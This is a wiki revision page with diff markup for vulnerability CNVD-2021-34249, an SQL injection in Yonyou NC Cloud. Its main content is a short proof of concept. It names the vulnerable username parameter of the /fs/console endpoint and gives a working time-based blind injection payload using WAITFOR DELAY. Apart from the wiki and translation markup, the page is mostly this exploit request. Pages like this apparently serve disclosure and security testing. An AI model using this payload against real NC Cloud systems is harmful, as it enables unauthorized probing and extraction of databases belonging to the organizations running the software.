Difference between revisions of "CNVD-2021-34249 用友NC Cloud SQL注入漏洞"

Latest revision as of 16:06, 10 June 2021

Other languages:

NC Cloud

"NCCloud"

⚠️️username處可以注入。

/fs/console?username=admin&password=123456

/fs/console?username=admin';WAITFOR DELAY '0:0:5' --&password=123456

@@ Line 2: / Line 2: @@
 <translate>
-==影響版本==
+==影響版本== <!--T:1-->
 </translate>
 NC Cloud
@@ Line 11: / Line 11: @@
 </pre>
-==POC==
+<translate>
+==漏洞位置== <!--T:3-->
+</translate>
+<translate>
+<!--T:2-->
+⚠️️username處可以注入。
+</translate>
 <pre>
 /fs/console?username=admin&password=123456
+</pre>
+==Payload==
+<pre>
+/fs/console?username=admin';WAITFOR DELAY '0:0:5' --&password=123456
 </pre>